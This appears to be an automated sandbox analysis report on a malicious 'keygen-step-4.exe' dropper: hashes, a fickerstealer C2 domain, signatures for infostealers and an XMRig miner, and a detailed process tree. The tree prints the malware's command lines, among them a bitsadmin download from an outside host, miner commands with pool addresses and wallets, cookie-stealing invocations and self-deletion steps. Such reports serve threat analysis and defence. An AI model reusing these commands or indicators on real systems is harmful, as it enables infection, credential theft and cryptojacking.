Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1773s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    25-04-2021 11:06

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 49 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
    • Modifies registry class
    PID:2688
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2676
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2560
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2364
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2340
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1916
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1448
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Themes
            1⤵
              PID:1304
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1228
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                1⤵
                  PID:1108
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:908
                  • C:\Users\Admin\AppData\Roaming\swvttjs
                    C:\Users\Admin\AppData\Roaming\swvttjs
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:4788
                  • C:\Users\Admin\AppData\Roaming\euvttjs
                    C:\Users\Admin\AppData\Roaming\euvttjs
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:4852
                    • C:\Users\Admin\AppData\Roaming\euvttjs
                      C:\Users\Admin\AppData\Roaming\euvttjs
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:6072
                  • C:\Users\Admin\AppData\Roaming\swvttjs
                    C:\Users\Admin\AppData\Roaming\swvttjs
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:5924
                  • C:\Users\Admin\AppData\Roaming\euvttjs
                    C:\Users\Admin\AppData\Roaming\euvttjs
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:5064
                    • C:\Users\Admin\AppData\Roaming\euvttjs
                      C:\Users\Admin\AppData\Roaming\euvttjs
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5616
                  • C:\Users\Admin\AppData\Roaming\swvttjs
                    C:\Users\Admin\AppData\Roaming\swvttjs
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:1012
                  • C:\Users\Admin\AppData\Roaming\euvttjs
                    C:\Users\Admin\AppData\Roaming\euvttjs
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:5744
                    • C:\Users\Admin\AppData\Roaming\euvttjs
                      C:\Users\Admin\AppData\Roaming\euvttjs
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5632
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                  1⤵
                    PID:296
                  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                    1⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:512
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                      2⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:896
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                        3⤵
                        • Loads dropped DLL
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1524
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1788
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:2260
                      • C:\Users\Admin\AppData\Local\Temp\is-7A662.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-7A662.tmp\Install.tmp" /SL5="$401A4,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:2656
                        • C:\Users\Admin\AppData\Local\Temp\is-I9AGR.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-I9AGR.tmp\Ultra.exe" /S /UID=burnerch1
                          4⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3748
                          • C:\Program Files\Windows Portable Devices\PTTKASQBXH\ultramediaburner.exe
                            "C:\Program Files\Windows Portable Devices\PTTKASQBXH\ultramediaburner.exe" /VERYSILENT
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4168
                            • C:\Users\Admin\AppData\Local\Temp\is-GQBPC.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-GQBPC.tmp\ultramediaburner.tmp" /SL5="$80068,281924,62464,C:\Program Files\Windows Portable Devices\PTTKASQBXH\ultramediaburner.exe" /VERYSILENT
                              6⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:4200
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                7⤵
                                • Executes dropped EXE
                                PID:4288
                          • C:\Users\Admin\AppData\Local\Temp\e3-cb6ec-712-4fe9f-02a7966b1b2c4\Nozhehuqipae.exe
                            "C:\Users\Admin\AppData\Local\Temp\e3-cb6ec-712-4fe9f-02a7966b1b2c4\Nozhehuqipae.exe"
                            5⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4324
                          • C:\Users\Admin\AppData\Local\Temp\07-2217c-bea-4b3b6-41ce55c40d103\Pepyqarigu.exe
                            "C:\Users\Admin\AppData\Local\Temp\07-2217c-bea-4b3b6-41ce55c40d103\Pepyqarigu.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4404
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gld2j4hi.rej\instEU.exe & exit
                              6⤵
                                PID:4820
                                • C:\Users\Admin\AppData\Local\Temp\gld2j4hi.rej\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\gld2j4hi.rej\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5188
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4oqehpxx.iao\google-game.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5772
                                • C:\Users\Admin\AppData\Local\Temp\4oqehpxx.iao\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\4oqehpxx.iao\google-game.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious use of SetWindowsHookEx
                                  • Suspicious use of WriteProcessMemory
                                  PID:5964
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    8⤵
                                      PID:6136
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qu5epxhj.vcw\md1_1eaf.exe & exit
                                  6⤵
                                    PID:5148
                                    • C:\Users\Admin\AppData\Local\Temp\qu5epxhj.vcw\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\qu5epxhj.vcw\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:5260
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uqdr02bs.23a\y1.exe & exit
                                    6⤵
                                      PID:5520
                                      • C:\Users\Admin\AppData\Local\Temp\uqdr02bs.23a\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\uqdr02bs.23a\y1.exe
                                        7⤵
                                        • Executes dropped EXE
                                        PID:6036
                                        • C:\Users\Admin\AppData\Local\Temp\Qc3rry6lPZ.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Qc3rry6lPZ.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:4336
                                          • C:\Users\Admin\AppData\Roaming\1619349118283.exe
                                            "C:\Users\Admin\AppData\Roaming\1619349118283.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619349118283.txt"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:4140
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Qc3rry6lPZ.exe"
                                            9⤵
                                              PID:1836
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                10⤵
                                                • Runs ping.exe
                                                PID:4356
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\uqdr02bs.23a\y1.exe"
                                            8⤵
                                              PID:5828
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:4732
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rtlmpuii.ira\askinstall39.exe & exit
                                          6⤵
                                            PID:5716
                                            • C:\Users\Admin\AppData\Local\Temp\rtlmpuii.ira\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\rtlmpuii.ira\askinstall39.exe
                                              7⤵
                                                PID:5080
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  8⤵
                                                    PID:5268
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:3284
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cuqfgcu1.jr4\inst.exe & exit
                                                6⤵
                                                  PID:1724
                                                  • C:\Users\Admin\AppData\Local\Temp\cuqfgcu1.jr4\inst.exe
                                                    C:\Users\Admin\AppData\Local\Temp\cuqfgcu1.jr4\inst.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4652
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubsoqsyb.2wj\SunLabsPlayer.exe /S & exit
                                                  6⤵
                                                    PID:4240
                                                    • C:\Users\Admin\AppData\Local\Temp\ubsoqsyb.2wj\SunLabsPlayer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\ubsoqsyb.2wj\SunLabsPlayer.exe /S
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in Program Files directory
                                                      PID:2400
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:4940
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:1320
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:2460
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                              8⤵
                                                              • Loads dropped DLL
                                                              • Modifies registry class
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:6136
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:776
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:2140
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Checks for any installed AV software in registry
                                                                  PID:5180
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                  8⤵
                                                                  • Download via BitsAdmin
                                                                  PID:4724
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pA4ibSiETYDLITxK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:1480
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -psw9hDguHVuWre2G -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:3336
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:1012
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5212
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4884
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:3076
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:5712
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\XpEnxhdqW\XpEnxhdqW.dll" XpEnxhdqW
                                                                            8⤵
                                                                            • Loads dropped DLL
                                                                            PID:4100
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\XpEnxhdqW\XpEnxhdqW.dll" XpEnxhdqW
                                                                              9⤵
                                                                                PID:5440
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:4800
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5092
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4364
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:4788
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshA437.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:4664
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Drops file in Program Files directory
                                                                                        PID:6036
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          9⤵
                                                                                          • Loads dropped DLL
                                                                                          • Drops file in System32 directory
                                                                                          PID:5440
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qlpxrq5a.ppf\GcleanerWW.exe /mixone & exit
                                                                                    6⤵
                                                                                      PID:5404
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2lvsvvbp.yog\toolspab1.exe & exit
                                                                                      6⤵
                                                                                        PID:5496
                                                                                        • C:\Users\Admin\AppData\Local\Temp\2lvsvvbp.yog\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\2lvsvvbp.yog\toolspab1.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:3932
                                                                                          • C:\Users\Admin\AppData\Local\Temp\2lvsvvbp.yog\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\2lvsvvbp.yog\toolspab1.exe
                                                                                            8⤵
                                                                                              PID:5852
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dbkszxit.xhr\c7ae36fa.exe & exit
                                                                                          6⤵
                                                                                            PID:6076
                                                                                            • C:\Users\Admin\AppData\Local\Temp\dbkszxit.xhr\c7ae36fa.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\dbkszxit.xhr\c7ae36fa.exe
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:5244
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pmbtpkix.hg2\app.exe /8-2222 & exit
                                                                                            6⤵
                                                                                              PID:2080
                                                                                              • C:\Users\Admin\AppData\Local\Temp\pmbtpkix.hg2\app.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\pmbtpkix.hg2\app.exe /8-2222
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5540
                                                                                                • C:\Users\Admin\AppData\Local\Temp\pmbtpkix.hg2\app.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\pmbtpkix.hg2\app.exe" /8-2222
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:5276
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4584
                                                                                      • C:\Users\Admin\AppData\Roaming\771A.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\771A.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4656
                                                                                        • C:\Users\Admin\AppData\Roaming\771A.tmp.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\771A.tmp.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks processor information in registry
                                                                                          PID:6112
                                                                                      • C:\Users\Admin\AppData\Roaming\7A67.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\7A67.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:2164
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w12880@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                          4⤵
                                                                                            PID:5312
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w26475 --cpu-max-threads-hint 50 -r 9999
                                                                                            4⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:5608
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          3⤵
                                                                                            PID:5272
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping 127.0.0.1
                                                                                              4⤵
                                                                                              • Runs ping.exe
                                                                                              PID:5456
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4820
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          PID:4956
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                              PID:5088
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4340
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
